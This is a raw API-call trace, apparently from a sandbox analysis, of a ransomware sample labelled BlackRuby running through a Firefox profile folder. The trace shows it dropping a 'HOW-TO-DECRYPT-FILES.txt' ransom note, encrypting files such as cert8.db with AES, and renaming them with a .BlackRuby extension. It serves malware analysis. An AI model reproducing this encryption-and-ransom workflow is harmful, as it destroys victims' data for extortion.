1 [0052.060] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.061] GetLastError () returned 0x12 [0052.061] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.061] GetLastError () returned 0x12 [0052.061] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.062] SetErrorMode (uMode=0x0) returned 0x1 [0052.062] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360a20 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.063] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.063] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0052.064] GetLastError () returned 0x12 [0052.064] FindNextFileW (in: hFindFile=0x360a20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0052.064] GetLastError () returned 0x12 [0052.064] FindClose (in: hFindFile=0x360a20 | out: hFindFile=0x360a20) returned 1 [0052.065] SetErrorMode (uMode=0x0) returned 0x1 [0052.065] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), fInfoLevelId=0x0, lpFileInformation=0x1c5bc78 | out: lpFileInformation=0x1c5bc78*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x889889e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x889889e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x889aeb40, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x18)) returned 1 [0052.066] GetLastError () returned 0x12 [0052.066] SetErrorMode (uMode=0x0) returned 0x1 [0052.066] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.067] GetLastError () returned 0x0 [0052.067] GetFileType (hFile=0x184) returned 0x1 [0052.067] SetErrorMode (uMode=0x0) returned 0x1 [0052.067] GetFileType (hFile=0x184) returned 0x1 [0052.067] WriteFile (in: hFile=0x184, lpBuffer=0x1c77868*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb7c, lpOverlapped=0x0 | out: lpBuffer=0x1c77868*, lpNumberOfBytesWritten=0x18eb7c*=0x18da, lpOverlapped=0x0) returned 1 [0052.068] GetLastError () returned 0x0 [0052.068] CloseHandle (hObject=0x184) returned 1 [0052.068] GetLastError () returned 0x0 [0052.068] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0052.068] GetLastError () returned 0x0 [0052.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), fInfoLevelId=0x0, lpFileInformation=0x1c795a4 | out: lpFileInformation=0x1c795a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3348a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3348a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0052.068] GetLastError () returned 0x0 [0052.069] SetErrorMode (uMode=0x0) returned 0x1 [0052.069] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.069] GetLastError () returned 0x0 [0052.069] GetFileType (hFile=0x184) returned 0x1 [0052.069] SetErrorMode (uMode=0x0) returned 0x1 [0052.069] GetFileType (hFile=0x184) returned 0x1 [0052.069] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x10000 [0052.069] GetLastError () returned 0x0 [0052.069] ReadFile (in: hFile=0x184, lpBuffer=0x1c7b458, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1c7b458*, lpNumberOfBytesRead=0x18eb68*=0x10000, lpOverlapped=0x0) returned 1 [0052.078] GetLastError () returned 0x0 [0052.078] CloseHandle (hObject=0x184) returned 1 [0052.078] GetLastError () returned 0x0 [0052.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3348a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3348a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc0478a0, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0052.078] GetLastError () returned 0x0 [0052.078] SetErrorMode (uMode=0x0) returned 0x1 [0052.078] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c708) returned 1 [0052.078] GetLastError () returned 0x0 [0052.108] CryptImportKey (in: hProv=0x37c708, pbData=0x1cf583c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360b20) returned 1 [0052.108] GetLastError () returned 0x0 [0052.108] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.108] GetLastError () returned 0x0 [0052.113] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.113] GetLastError () returned 0x0 [0052.113] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360b60) returned 1 [0052.113] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.113] GetLastError () returned 0x0 [0052.113] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1d22888*=0x1, dwFlags=0x0) returned 1 [0052.113] GetLastError () returned 0x0 [0052.113] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1d22854, dwFlags=0x0) returned 1 [0052.113] GetLastError () returned 0x0 [0052.113] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d228d0*, pdwDataLen=0x18eb58*=0x10100, dwBufLen=0x10100 | out: pbData=0x1d228d0*, pdwDataLen=0x18eb58*=0x10100) returned 1 [0052.114] GetLastError () returned 0x0 [0052.114] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d42afc*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1d42afc*, pdwDataLen=0x18eb70*=0x10) returned 1 [0052.114] GetLastError () returned 0x0 [0052.114] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d42b2c*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1d42b2c*, pdwDataLen=0x18eb78*=0x10) returned 1 [0052.114] GetLastError () returned 0x0 [0052.115] CryptDestroyKey (hKey=0x360b20) returned 1 [0052.115] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.115] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0052.115] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.116] GetLastError () returned 0xb7 [0052.116] GetFileType (hFile=0x184) returned 0x1 [0052.116] GetFileType (hFile=0x184) returned 0x1 [0052.118] CloseHandle (hObject=0x184) returned 1 [0052.118] GetLastError () returned 0xb7 [0052.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e3348a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7e3348a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x27440340, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x10110)) returned 1 [0052.118] GetLastError () returned 0xb7 [0052.118] SetErrorMode (uMode=0x0) returned 0x1 [0052.118] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_Vzu6AcEsHuFR7jtylimahFmBfFhWNzsxKGEWTYLR.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_vzu6aceshufr7jtylimahfmbffhwnzsxkgewtylr.blackruby")) returned 1 [0052.118] GetLastError () returned 0xb7 [0052.122] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.122] GetLastError () returned 0xb7 [0052.122] SetErrorMode (uMode=0x1) returned 0x0 [0052.122] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.122] GetLastError () returned 0x5 [0052.124] SetErrorMode (uMode=0x0) returned 0x1 [0052.124] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\compatibility.ini", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\compatibility.ini", lpFilePart=0x0) returned 0x5c [0052.124] GetLastError () returned 0x5 [0052.124] SetErrorMode (uMode=0x1) returned 0x0 [0052.124] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\compatibility.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b6bdec | out: lpFileInformation=0x1b6bdec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xbe55ec80, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xc2)) returned 1 [0052.124] GetLastError () returned 0x5 [0052.124] SetErrorMode (uMode=0x0) returned 0x1 [0052.125] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0052.125] GetLastError () returned 0x5 [0052.125] SetErrorMode (uMode=0x1) returned 0x0 [0052.125] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0052.125] GetLastError () returned 0x5 [0052.126] SetErrorMode (uMode=0x0) returned 0x1 [0052.127] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", lpFilePart=0x0) returned 0x5f [0052.127] GetLastError () returned 0x5 [0052.127] SetErrorMode (uMode=0x1) returned 0x0 [0052.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1b89efc | out: lpFileInformation=0x1b89efc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851984e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x851984e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x86704ae0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x38000)) returned 1 [0052.127] GetLastError () returned 0x5 [0052.127] SetErrorMode (uMode=0x0) returned 0x1 [0052.127] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", lpFilePart=0x0) returned 0x5f [0052.127] GetLastError () returned 0x5 [0052.127] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", lpFilePart=0x0) returned 0x5f [0052.127] GetLastError () returned 0x5 [0052.127] SetErrorMode (uMode=0x1) returned 0x0 [0052.127] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0052.127] GetLastError () returned 0x0 [0052.127] GetFileType (hFile=0x184) returned 0x1 [0052.127] SetErrorMode (uMode=0x0) returned 0x1 [0052.127] GetFileType (hFile=0x184) returned 0x1 [0052.128] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x38000 [0052.128] GetLastError () returned 0x0 [0052.128] ReadFile (in: hFile=0x184, lpBuffer=0x2d604f0, nNumberOfBytesToRead=0x38000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2d604f0*, lpNumberOfBytesRead=0x18eb68*=0x38000, lpOverlapped=0x0) returned 1 [0052.138] GetLastError () returned 0x0 [0052.138] CloseHandle (hObject=0x184) returned 1 [0052.138] GetLastError () returned 0x0 [0052.140] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite", lpFilePart=0x0) returned 0x5f [0052.140] GetLastError () returned 0x0 [0052.140] SetErrorMode (uMode=0x1) returned 0x0 [0052.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x851984e0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x851984e0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x86704ae0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x38000)) returned 1 [0052.140] GetLastError () returned 0x0 [0052.140] SetErrorMode (uMode=0x0) returned 0x1 [0052.140] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c708) returned 1 [0052.140] GetLastError () returned 0x0 [0052.173] CryptImportKey (in: hProv=0x37c708, pbData=0x1be63f8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360b60) returned 1 [0052.173] GetLastError () returned 0x0 [0052.173] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.173] GetLastError () returned 0x0 [0052.178] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.178] GetLastError () returned 0x0 [0052.178] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360ee0) returned 1 [0052.178] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0052.178] GetLastError () returned 0x0 [0052.178] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x4, pbData=0x1c13444*=0x1, dwFlags=0x0) returned 1 [0052.178] GetLastError () returned 0x0 [0052.178] CryptSetKeyParam (hKey=0x360ee0, dwParam=0x1, pbData=0x1c13410, dwFlags=0x0) returned 1 [0052.178] GetLastError () returned 